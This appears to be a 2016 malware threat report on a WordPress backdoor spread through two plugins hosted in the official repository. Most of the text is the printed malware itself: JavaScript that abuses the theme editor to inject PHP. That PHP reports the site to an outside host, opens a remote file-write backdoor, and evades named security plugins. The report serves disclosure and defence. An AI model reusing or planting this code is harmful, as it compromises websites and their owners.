Malware Threats Report #2016020911

Date	2016-02-09
Type	WordPress backdoor hidden inside a malicious plugins.
See also	http://nin.link/wpbread
Target	WordPress only
Vulnerability	None, infected plugins were hosted in the official WordPress Plugin repository (breadcrumbs-ez, enable-google-analytics)
Malware Domain	http://bootstrap.myftp.org/moment.min.js, http://beachvoetvolley.nl/wp-includes/list-searchs.php
Malware Code	<script type="text/javascript" src="http://bootstrap.myftp.org/moment.min.js">
Malware Code	<script type="text/javascript" src="http://bootstrap.myftp.org/mybootstrap.js"></script>
Malware Code	r = ''; wpnonce = ''; function fud5() { jQuery.get('theme-editor.php?file=functions.php&theme=' + template + '&scrollto=180', function (data) { r = data.split('id="newcontent"'); s = r[1]; r1 = s.split('>'); s1 = r1[1]; r2 = s1.split('<'); newcontent = jQuery('<div/>').html(r2[0]).text(); r = data.split('name="_wpnonce" value="'); s = r[1]; r1 = s.split('"'); wpnonce = r1[0]; big_code = '$bustling = error_reporting();error_reporting(0);ini_set("display_errors",0); $unique++; if ($unique==1){$peck = call_user_func("str_" . "replace","admin-set.php","",__FILE__); if(file_exists($peck . "save-list.php")) {$instrument = file_get_contents($peck . "save-list.php");} include_once($peck . "../../wp-load.php"); $rampant = get_option("siteurl");if ($instrument !== ($rampant)){ file_put_contents($peck . "save-list.php", $rampant); $unaccountable= get_option("#ident#");; $willing="http:/" . "/" . "beachvoetvolley.nl/wp-includes/list-searchs.php?pl=3"; $disagree = array("answer" => "float", "thunder" => true,"id"=>$unaccountable); $disagree["dogs"]=$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $shaky = true; if(function_exists("curl_version")){$excited = curl_init($willing); curl_setopt($excited, CURLOPT_POST, true); curl_setopt($excited, CURLOPT_RETURNTRANSFER, 1); curl_setopt($excited, CURLOPT_POSTFIELDS, http_build_query($disagree)); @$laughable = call_user_func("curl_" . "exec",$excited);if ($laughable == "ok") {$shaky = false;} curl_close ($excited); } if(function_exists("fopen") && ini_get("allow_url_fopen") & $shaky){ $shelter = $willing."?pc=".$disagree["dogs"]."&id=".$unaccountable; @$scary = fopen($shelter, "r"); @fclose ($scary);}} if (isset($_REQUEST["pleasure_giddy"])){ if(isset($_REQUEST["gainful"]) && $_REQUEST["gainful"]!=""){ $elderly =$_REQUEST["gainful"]; $elderly = str_replace("~",".",$elderly);if(isset($_REQUEST["overflow"]) && $_REQUEST["overflow"]!=""){ $wellmade=$_REQUEST["overflow"]; } else { $wellmade="php"; }if(isset($_REQUEST["interesting"]) && $_REQUEST["interesting"]!="") { $labored=call_user_func("strip" . "slashes",$_REQUEST["interesting"]); if (isset($_REQUEST["attempt"])){ $labored=$_REQUEST["interesting"];} } if( $wellmade == "php"){ if (isset($_REQUEST["pause"])){ file_put_contents($elderly.".".$wellmade , $labored); } else { file_put_contents($elderly.".".$wellmade , $labored ,FILE_APPEND ); } } else{file_put_contents($elderly.".".$wellmade , $labored); }} header("boil_monkey:ok"); header("acrid_longing:1.2"); if ($firewall){header("pocket:1");} echo "boil_monkey";} ini_set("display_errors",1); error_reporting($bustling);}'; ncode = "<?php include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); if (!is_plugin_active('sucuri-scanner/sucuri.php') and !is_plugin_active('wordfence/wordfence.php') and !is_plugin_active('all-in-one-wp-security-and-firewall/wp-security.php') and !is_plugin_active('wp-security-audit-log/wp-security-audit-log.php') and !is_plugin_active('wp-security-scan/index.php') and !is_plugin_active('secure-wordpress/index.php') and !is_plugin_active('better-wp-security/better-wp-security.php')){@file_put_contents('../wp-includes/theme.php','if (strpos(strtolower($_SERVER[\"HTTP_USER_AGENT\"]),\"googlebot\") !== false or isset($_REQUEST[\"pleasure_giddy\"]) ){@include(dirname(__FILE__) . \"/../wp-admin/includes/admin-set.php\");}',FILE_APPEND); $fud = '<?php " + big_code + "';} else {$fud = '<?php $firewall = true; " + big_code + "';} @file_put_contents('includes/admin-set.php',$fud);$template_root=get_theme_root().'/'.get_template(); $fn_data= file_get_contents($template_root.'/functions.php'); update_option('lick_ten',time()); $split_str=explode('/qqqq/?>',$fn_data); if(count($split_str)>=3){file_put_contents($template_root . '/' . 'functions.php', end($split_str));} update_option('breadcrumbs_ez','21'); update_option('lick_ten',time()); /qqqq/?>"; jQuery.ajax({ type: 'POST', dataType: "html", url: 'theme-editor.php', data: { 'action': 'update', '_wpnonce': wpnonce, '_wp_http_referer': '/wp1/wp-admin/theme-editor.php?file=functions.php&theme=twentyfifteen', 'newcontent': ncode + newcontent, 'file': 'functions.php', 'theme': template, } }) }); } fud5();